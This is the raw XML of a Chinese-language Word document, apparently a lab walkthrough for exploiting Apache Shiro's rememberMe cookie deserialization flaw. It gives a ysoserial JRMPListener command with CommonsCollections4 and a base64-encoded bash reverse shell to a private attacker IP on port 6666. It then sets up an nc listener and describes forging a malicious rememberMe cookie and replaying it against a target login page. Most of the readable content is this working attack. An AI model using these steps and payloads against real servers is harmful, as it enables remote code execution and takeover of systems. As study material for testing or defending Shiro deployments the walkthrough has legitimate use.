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F1789" w14:textId="11A29EF8" w:rsidR="0082410E" w:rsidRDefault="0082410E" w:rsidP="0082410E">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用在线荷载生产器生成适用于反序列化反弹shell的payload：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B95DA5" w14:textId="59A8A403" w:rsidR="00FC718D" w:rsidRDefault="00FC718D" w:rsidP="0082410E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC718D">
        <w:t>http://www.jackson-t.ca/runtime-exec-payloads.html</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="27720312" w14:textId="3D53E5BC" w:rsidR="0082410E" w:rsidRDefault="0082410E" w:rsidP="0082410E">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56A13231" wp14:editId="3F89EC62">
            <wp:extent cx="5274310" cy="4451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0D6E" w14:textId="4112B5FB" w:rsidR="0082410E" w:rsidRDefault="0082410E" w:rsidP="0082410E">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0082410E">
        <w:t>ysoserial.jar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将payload合成为一个使用java</w:t>
      </w:r>
      <w:r w:rsidRPr="0082410E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监听本地1099端口的指令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF1C45E" w14:textId="05DC2D16" w:rsidR="0082410E" w:rsidRDefault="0082410E" w:rsidP="0082410E">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0082410E">
        <w:t>java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExOS4xMzkvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABA62BB" w14:textId="234F578F" w:rsidR="0082410E" w:rsidRDefault="0082410E" w:rsidP="0082410E">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D0C87CA" wp14:editId="5529694B">
            <wp:extent cx="5274310" cy="552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BE86" w14:textId="2A4324DA" w:rsidR="008B58AD" w:rsidRDefault="008B58AD" w:rsidP="008B58AD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用nc监听本地6666端口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B703CF" w14:textId="77777777" w:rsidR="008B58AD" w:rsidRDefault="008B58AD" w:rsidP="008B58AD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="725AFBDD" wp14:editId="277D5475">
            <wp:extent cx="5274310" cy="2524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004" w14:textId="4219C9AE" w:rsidR="008B58AD" w:rsidRDefault="008B58AD" w:rsidP="0082410E">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B4FD447" w14:textId="32386C16" w:rsidR="0082410E" w:rsidRDefault="0082410E" w:rsidP="0082410E">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:object w:dxaOrig="1533" w:dyaOrig="1111" w14:anchorId="61977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5.7pt" o:ole="">
            <v:imagedata r:id="rId9" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1636455784" r:id="rId10"/>
        </w:object>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成</w:t>
      </w:r>
      <w:r w:rsidR="008B58AD">
        <w:t xml:space="preserve">恶意 </w:t>
      </w:r>
      <w:r w:rsidR="008B58AD">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="E96900"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>Cookie rememberMe</w:t>
      </w:r>
      <w:r w:rsidR="008B58AD">
        <w:t>值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565C1A10" w14:textId="049DEA2F" w:rsidR="008B58AD" w:rsidRDefault="008B58AD" w:rsidP="0082410E">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="228A5F4A" wp14:editId="721D47C7">
            <wp:extent cx="5274310" cy="580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24EE" w14:textId="77777777" w:rsidR="0095762D" w:rsidRDefault="0095762D" w:rsidP="0095762D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r w:rsidRPr="0082410E">
        <w:t>http://192.168.119.134/login.jsp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，拦截cookie中含有</w:t>
      </w:r>
      <w:r w:rsidRPr="0082410E">
        <w:t>rememberMe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数据包：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D080C5" w14:textId="77777777" w:rsidR="0095762D" w:rsidRDefault="0095762D" w:rsidP="0095762D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66E8FC40" wp14:editId="132218AA">
            <wp:extent cx="5274310" cy="3947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8A5" w14:textId="3C33DA4D" w:rsidR="0095762D" w:rsidRDefault="0095762D" w:rsidP="0082410E">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="E96900"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>Cookie rememberMe</w:t>
      </w:r>
      <w:r>
        <w:t>值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的为之前通过poc生成的恶意值后，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4A8EC5" w14:textId="7C20D555" w:rsidR="0095762D" w:rsidRDefault="0095762D" w:rsidP="0082410E">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12A50E20" wp14:editId="1021BFBB">
            <wp:extent cx="5274310" cy="1739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028D1" w14:textId="77777777" w:rsidR="009B6C42" w:rsidRDefault="009B6C42" w:rsidP="00FC718D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4BB95707" w14:textId="77777777" w:rsidR="009B6C42" w:rsidRDefault="009B6C42" w:rsidP="00FC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095DB" w14:textId="77777777" w:rsidR="009B6C42" w:rsidRDefault="009B6C42" w:rsidP="00FC718D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2F85E2D0" w14:textId="77777777" w:rsidR="009B6C42" w:rsidRDefault="009B6C42" w:rsidP="00FC7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0D"/>
    <w:rsid w:val="00796D0D"/>
    <w:rsid w:val="0082410E"/>
    <w:rsid w:val="008B58AD"/>
    <w:rsid w:val="0095762D"/>
    <w:rsid w:val="009B6C42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F93E4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1813AEF9-2BF5-4FB9-BCEE-D31AE425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1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410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B58A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C7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71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7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7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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-22T07:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-28T06:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>